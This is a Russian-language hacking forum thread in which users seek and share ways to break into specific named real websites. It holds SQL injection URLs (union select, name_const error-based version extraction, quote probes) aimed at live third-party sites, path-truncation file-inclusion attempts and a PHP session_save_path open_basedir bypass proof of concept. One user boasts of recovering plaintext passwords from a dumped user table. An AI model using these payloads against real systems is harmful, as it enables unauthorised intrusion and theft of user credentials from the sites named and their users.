Не подскажите, почему http://www.asteroid.ru/user_view.phtml?2034/2/17.phtml[///...///] Когда вставляю 4036 слешей, то они не отображаются, а когда 4037 то отображаются, да и вообще почему не пашет инклуд? Какие могут быть причины? Из за абсолютного пути? На счёт этого поста? http://forum.antichat.ru/showpost.php?p=1023030&postcount=16 Где собственно последовательность?)) И если на линухе 1к символов с копейками, и на Linux 4065, то если ставить допустим 5к символов, то сработает в любом случае и там и там? или сть какие правила? зы. Я хочу понять как это работает. На указанный сайт мне плевать.
us Code: http://www.asteroid.ru/user_view.phtml?2034/2/17 там и так по умолчанию нужное тебе расширение добавляется, чего ты там отрезать хочешь?
session.save_path safe_mode and open_basedir bypass Code: EXAMPLES: 1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS") 2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS") The main problem came when we use multiple ';' character and when we will create fake directory structure to reduce '../'. Proof of Concept: 0. Create directories: /humhum and /byp 1. set open_basedir = /byp 2. create test.php { session_save_path("/humhum"); session_start(); } 3. php test.php Warning: session_save_path(): open_basedir restriction in effect. File(/humhum) is not within the allowed path(s): (/byp) in /byp/test.php on line 3 4. subdir.php { mkdir("puf"); mkdir(";a"); } 5. php subdir.php 6. cd puf 7. create byp.php { session_save_path(";;/byp/;a/../../humhum"); session_start(); } 8. php byp.php 9. ls /humhum sess_d905eb71c9ad65ce2a845cdb0fed3016 The main problem is located in session.c. PHP doesn't check, that we have used next ';' after first. Creating fake directory structure mkdir ';a' mkdir '../;a' we can reduce directory level using '../' .
либо: Code: _http://www.orderflowers.co.il/products.php?cid=49+and+(1,1)=(select+*+from+(select+name_const(version(),1),name_const(version(),1))eba%20) Duplicate column name '5.0.77'
Подскажите, вот что сегодня ношел: Code: http://www.federationpress.com.au/journals/abstract.asp?id=144' Я так понял, что это MS Acces. Прочитал статью о таких инъекциях - ничего не смог сделать Вот еще такая же: Code: http://www.etradesman.com.au/tradesman/tradesman.asp?id=144' Как быть с такими? И еще хотел спросить что это такое? Code: http://www.startdreams.com.au/LearnAboutMoney/KB_Content.aspx?section=KB_MB&id=144' Можно ли провести инъекцию при такой ошибке?
серьезно ? Code: http://www.etradesman.com.au/tradesman/tradesman.asp?id=144+union+select+1+from+news
короче есть скуль. вывожу все колонки - показывает все кроме password, хотя она существует. вопрос: почему? и где пароли?
Может ли оказаться так что небудет принтабельного поля? http://www.zckc.com.tw/products.php?cID=49%20union%20select%201,version(),3%20--
+100500 действительно пароли оказались только у нескольких пользователей из сотен или тысяч. и все в открытом виде гыыы.
не могу понять есть тут sql иньекция или нет... http://www.klipart.ru/package.php?id=symmetricspiders' дошел до 50 столбцов и ничего.
